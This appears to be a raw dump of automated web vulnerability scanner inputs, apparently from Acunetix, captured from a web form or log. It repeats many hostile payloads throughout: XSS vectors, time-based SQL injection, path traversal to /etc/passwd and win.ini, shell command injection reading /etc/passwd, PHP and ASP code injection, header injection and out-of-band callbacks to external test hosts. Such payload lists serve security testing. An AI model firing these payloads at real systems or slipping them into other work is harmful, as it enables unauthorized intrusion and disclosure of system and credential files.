1

1

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(953078)>

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<img/src=">" onerror=alert(971724)>

cat /etc/passwd

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

-1

1<ScRiPt%20>prompt(979795)</sCripT>

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

${100275+99498}

1

1some_inexistent_file_with_long_name%00.jpg

1&lt

1

-1)

|cat /etc/passwd#

1

1

1&n930711=v934062

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1))

1

\xf6<img acu onmouseover=prompt(901592) //\xf6>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

1

)

1

1

vbkEFXp4'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

testasp.vulnweb.com

1<input autofocus onfocus=prompt(955673)>

1

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

!(()&&!|*|*|

1AXgpM8G')

1

<a href='http://www.acunetix.com'>website security</a>

1

'"()

27N6g26E'))

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

-1

1

'

[url=http://www.acunetix.com]website security[/url]

1

1

"

/etc/passwd

1

1

-1)

1

${@print(md5(acunetix_wvs_security_test))}

1

"

1_YGO7n <ScRiPt >prompt(929584)</ScRiPt>

1

${@print(md5(acunetix_wvs_security_test))}\

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1))

1

1

1

1

1

http://hitDtGsdfpANT.bxss.me/

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

0k9hDrAI'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

UpPK2gqT')

1

comments

http://www.acunetix.tst

1

1

&dir

1

1

comments

'"

ldezqmoZ'))

'&dir&'

1'"()&%<ScRiPt >prompt(938257)</ScRiPt>

1

1

1

comments/.

"&dir&"

<!--

file:///etc/passwd

1

'"()&%<ScRiPt >prompt(950243)</ScRiPt>

1

1

|dir

1

1_918312

1

1

/\../\../\../\../\../\../\../etc/passwd

1

'|dir

1

1

1

"|dir

WEB-INF/web.xml

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

../../../../../../../../../../boot.ini

acu10335\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10335

1

1

1

acux6645\xc0\xbez1\xc0\xbcz2a\x90bcxuca6645

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(934886)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(915607)</script>

1

1

1

1<ScRiPt >prompt(943478)</ScRiPt>

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?996450></ScRiPt>

1

1

1<ScRiPt >prompt(964257)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(978152)">

1

1

1

response.write(9160718*9644471)

&cat /etc/passwd&

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(993949)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<div style=width:expression(prompt(949834))>

'+response.write(9160718*9644471)+'

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

"+response.write(9160718*9644471)+"

1

1<iframe src='data:text/html

WEB-INF/web.xml

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

WEB-INF\web.xml

1<body onload=prompt(954502)>

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(997742)>

${99278+99607}

1

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

-1

1

1<img src=xyz OnErRor=prompt(928422)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

1

1

1

1&n951016=v931999

1<img/src=">" onerror=alert(986505)>

)

-1)

1<ScRiPt%20>prompt(982324)</sCripT>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1))

1&lt

!(()&&!|*|*|

1

'|'ld

1

'"()

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

\xf6<img acu onmouseover=prompt(985621) //\xf6>

1

1

1

GaCCRyNF'

^(#$!@#$)(()))******

1

"|"ld

'

1<input autofocus onfocus=prompt(915151)>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

1

1

HNaDtomL')

"

1

1

/etc/passwd

<a href='http://www.acunetix.com'>website security</a>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

3VXjagn9'))

${@print(md5(acunetix_wvs_security_test))}

1

'

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1

"

1

1

${@print(md5(acunetix_wvs_security_test))}\

http://hit1UMUFueu7S.bxss.me/

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1)

1_onsA5 <ScRiPt >prompt(910845)</ScRiPt>

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

&dir

1

1

-1))

1

'"

http://www.acunetix.tst

comments

1

1

'&dir&'

1

<!--

comments/.

file:///etc/passwd

1

ATfaX8Ze'

"&dir&"

1'"()&%<ScRiPt >prompt(977368)</ScRiPt>

1

1

1

1

NB8o008a')

'"()&%<ScRiPt >prompt(952020)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

|dir

nZ6mZm46'))

1

1

'|dir

1

WEB-INF/web.xml

1

1_951664

1

"|dir

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acu7346\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7346

1

................windowswin.ini

acux2855\xc0\xbez1\xc0\xbcz2a\x90bcxuca2855

1

1

1<ScRiPt >prompt(941830)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<script>prompt(999540)</script>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(956477)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9661604*9940313)

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?913531></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

'+response.write(9661604*9940313)+'

1

1

1

1<ScRiPt >prompt(914686)</ScRiPt>

"+response.write(9661604*9940313)+"

1

WEB-INF/web.xml

1

1

1<video><source onerror="javascript:prompt(942316)">

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1

../../../../../../../../../../etc/passwd

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(979826)"></g></svg>

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<div style=width:expression(prompt(985229))>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<iframe src='data:text/html

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1<body onload=prompt(972118)>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

1

1

cat /etc/passwd

1

1

${99022+99137}

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(900016)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1

1

1

1<img src=xyz OnErRor=prompt(920985)>

`cat /etc/passwd`

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

-1)

1<img/src=">" onerror=alert(921916)>

1

|cat /etc/passwd#

1&n910959=v963562

)

1<ScRiPt%20>prompt(937626)</sCripT>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

-1))

'"()

!(()&&!|*|*|

'|'ld

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1&lt

1

testasp.vulnweb.com

"|"ld

1

1

^(#$!@#$)(()))******

1QMsEv92'

1

/etc/passwd

1

\xf6<img acu onmouseover=prompt(959435) //\xf6>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<input autofocus onfocus=prompt(914643)>

vKj51AWD')

'

1

'

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

LZN3rNR7'))

"

<a href='http://www.acunetix.com'>website security</a>

"

acunetix_wvs_invalid_filename

1

http://hit3pnlUqvcuu.bxss.me/

1

||cat /etc/passwd

-1

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

&dir

1

${@print(md5(acunetix_wvs_security_test))}\

1_ql2eA <ScRiPt >prompt(968978)</ScRiPt>

-1)

http://www.acunetix.tst

1

'"

comments

1

1

'&dir&'

1

1

-1))

<!--

file:///etc/passwd

"&dir&"

1

1

1'"()&%<ScRiPt >prompt(998689)</ScRiPt>

comments/.

1

1

7dTETmhp'

1

1

'"()&%<ScRiPt >prompt(937351)</ScRiPt>

1

1

|dir

1

b856jhhy')

1

/\../\../\../\../\../\../\../etc/passwd

1

'|dir

1

1

1_903095

HbH00ACo'))

WEB-INF/web.xml

1

1

"|dir

WEB-INF\web.xml

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

../../../../../../../../../../boot.ini

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

acu6895\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6895

1

1

acux2508\xc0\xbez1\xc0\xbcz2a\x90bcxuca2508

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(933475)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<script>prompt(903975)</script>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(913447)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?953922></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<ScRiPt >prompt(978588)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(924038)">

WEB-INF/web.xml

1

1

1

1

WEB-INF\web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(964443)"></g></svg>

response.write(9084711*9655154)

1

1

1

'+response.write(9084711*9655154)+'

1<div style=width:expression(prompt(986132))>

1

&cat /etc/passwd&

1

1

1

1<iframe src='data:text/html

"+response.write(9084711*9655154)+"

../../../../../../../../../../etc/passwd

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(955894)>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

../../../../../../../../../../etc/passwd.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(975225)>

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<img src=xyz OnErRor=prompt(912944)>

`cat /etc/passwd`

1

1

1

-1)

${100083+100376}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img/src=">" onerror=alert(946506)>

1

-1))

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

S4f8Gr1i'

1<ScRiPt%20>prompt(926492)</sCripT>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&n980408=v944861

1some_inexistent_file_with_long_name%00.jpg

)

1

1

1&lt

WT5xZb7h')

'|'ld

!(()&&!|*|*|

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

gnweZJVD'))

\xf6<img acu onmouseover=prompt(981606) //\xf6>

1

'"()

testasp.vulnweb.com

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(906509)>

1

-1

/etc/passwd

1

'

'

1

1

<a href='http://www.acunetix.com'>website security</a>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

"

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1_aIga6 <ScRiPt >prompt(964504)</ScRiPt>

1

1

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

-1))

acunetix_wvs_invalid_filename

http://hitLVc0jAT8py.bxss.me/

&dir

1

1

${@print(md5(acunetix_wvs_security_test))}\

LTV3I0MO'

comments

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

file:///etc/passwd

1

'&dir&'

1

comments

C5BkyK3E')

1

1

/\../\../\../\../\../\../\../etc/passwd

http://www.acunetix.tst

1

'"

1'"()&%<ScRiPt >prompt(970317)</ScRiPt>

xWAv3IzN'))

comments/.

1

<!--

"&dir&"

WEB-INF/web.xml

1

1

1

1

'"()&%<ScRiPt >prompt(972892)</ScRiPt>

1

1

1

WEB-INF\web.xml

|dir

1

1

1_932414

1

../../../../../../../../../../windows/win.ini

1

1

1

'|dir

../../../../../../../../../../boot.ini

1

1

1

"|dir

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1

1

acu2997\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2997

1

acux1802\xc0\xbez1\xc0\xbcz2a\x90bcxuca1802

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(919982)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<script>prompt(935452)</script>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(936948)</ScRiPt>

response.write(9122614*9135200)

1

1

1

'+response.write(9122614*9135200)+'

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?929781></ScRiPt>

1

1

1

1

1<ScRiPt >prompt(916103)</ScRiPt>

"+response.write(9122614*9135200)+"

WEB-INF/web.xml

1

1

1

1<video><source onerror="javascript:prompt(973037)">

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

1

WEB-INF\web.xml

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(974416)"></g></svg>

1

1

1

../../../../../../../../../../etc/passwd

1

1

1

1<div style=width:expression(prompt(905421))>

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

${99186+99823}

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

cat /etc/passwd

1

1<iframe src='data:text/html

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

1some_inexistent_file_with_long_name%00.jpg

1&n967881=v998125

`cat /etc/passwd`

1<body onload=prompt(937200)>

)

1

-1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(987615)>

1

1

-1)

!(()&&!|*|*|

testasp.vulnweb.com

'|'ld

1

1<img src=xyz OnErRor=prompt(941693)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'"()

1

^(#$!@#$)(()))******

-1))

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<img/src=">" onerror=alert(949839)>

'

1

"|"ld

1

NdEFVriF'

1

1

1<ScRiPt%20>prompt(956990)</sCripT>

"

X942mjly')

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1&lt

1

1

yg1UR9Ti'))

${@print(md5(acunetix_wvs_security_test))}\

/etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

1

-1

\xf6<img acu onmouseover=prompt(998403) //\xf6>

1

1

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

acunetix_wvs_invalid_filename

http://hitv5ifEZodeS.bxss.me/

1

1<input autofocus onfocus=prompt(936290)>

-1)

1

||cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

&dir

-1))

<a href='http://www.acunetix.com'>website security</a>

1

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

1

Yn92dUKD'

'&dir&'

[url=http://www.acunetix.com]website security[/url]

'"

http://www.acunetix.tst

1

1'"()&%<ScRiPt >prompt(967303)</ScRiPt>

"&dir&"

1_e2zAB <ScRiPt >prompt(931500)</ScRiPt>

1

comments/.

Q4wjTLfG')

1

'"()&%<ScRiPt >prompt(906603)</ScRiPt>

<!--

|dir

1

file:///etc/passwd

XxVWOBbE'))

1

1

1

1

1_986424

1

'|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

"|dir

WEB-INF/web.xml

1

1

1

WEB-INF\web.xml

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

acu7204\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7204

1

1

acux1023\xc0\xbez1\xc0\xbcz2a\x90bcxuca1023

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(912053)</ScRiPt>

1

1

1

1<script>prompt(937378)</script>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(938330)</ScRiPt>

1

1

1

................windowswin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?920083></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(918470)</ScRiPt>

1

1

1

response.write(9924241*9889816)

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(958565)">

1

1

1

'+response.write(9924241*9889816)+'

&cat /etc/passwd&

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

../../../../../../../../../../etc/passwd

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(944701)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9924241*9889816)+"

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<div style=width:expression(prompt(963757))>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'&cat /etc/passwd&'

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

../../../../../../../../../../etc/passwd.jpg

1<iframe src='data:text/html

WEB-INF/web.xml

${100244+99396}

1

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

"&cat /etc/passwd&"

1some_inexistent_file_with_long_name%00.jpg

WEB-INF\web.xml

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<body onload=prompt(903596)>

1

cat /etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

)

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(939489)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n911688=v914034

1

1

!(()&&!|*|*|

-1

`cat /etc/passwd`

testasp.vulnweb.com

1<img src=xyz OnErRor=prompt(976791)>

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

^(#$!@#$)(()))******

1

1<img/src=">" onerror=alert(984267)>

|cat /etc/passwd#

-1)

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

'

'|'ld

-1))

1<ScRiPt%20>prompt(981985)</sCripT>

1

1

1

1

/etc/passwd

"

1

1&lt

1

2YM6ahkW'

"|"ld

1

\xf6<img acu onmouseover=prompt(901539) //\xf6>

1

${@print(md5(acunetix_wvs_security_test))}

1

1

Dv6Y0eXZ')

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://hitT3kOLh5YSI.bxss.me/

1<input autofocus onfocus=prompt(982456)>

acunetix_wvs_invalid_filename

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

${@print(md5(acunetix_wvs_security_test))}\

hm7jQFIm'))

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

comments

1

<a href='http://www.acunetix.com'>website security</a>

1

'

1

-1

1

1

[url=http://www.acunetix.com]website security[/url]

comments

http://www.acunetix.tst

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

'"

-1)

"

1_l1YKl <ScRiPt >prompt(948726)</ScRiPt>

1'"()&%<ScRiPt >prompt(954547)</ScRiPt>

comments/.

1

1

1

-1))

<!--

1

'"()&%<ScRiPt >prompt(944447)</ScRiPt>

1

1

||cat /etc/passwd

1

1

file:///etc/passwd

2dQD3mPw'

1

1

1

1

1

1_915837

&dir

1

/\../\../\../\../\../\../\../etc/passwd

zGpNAzJT')

1

1

'&dir&'

aHdHMF9E'))

WEB-INF/web.xml

1

1

1

WEB-INF\web.xml

1

"&dir&"

1

../../../../../../../../../../windows/win.ini

|dir

acu5890\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5890

1

../../../../../../../../../../boot.ini

acux3298\xc0\xbez1\xc0\xbcz2a\x90bcxuca3298

'|dir

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(946409)</ScRiPt>

"|dir

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<script>prompt(977304)</script>

1

1

1

................windowswin.ini

1<ScRiPt >prompt(934166)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?970514></ScRiPt>

1

1

1<ScRiPt >prompt(947461)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

response.write(9531085*9229330)

1

1<video><source onerror="javascript:prompt(933520)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(900093)"></g></svg>

1

'+response.write(9531085*9229330)+'

1

1

&cat /etc/passwd&

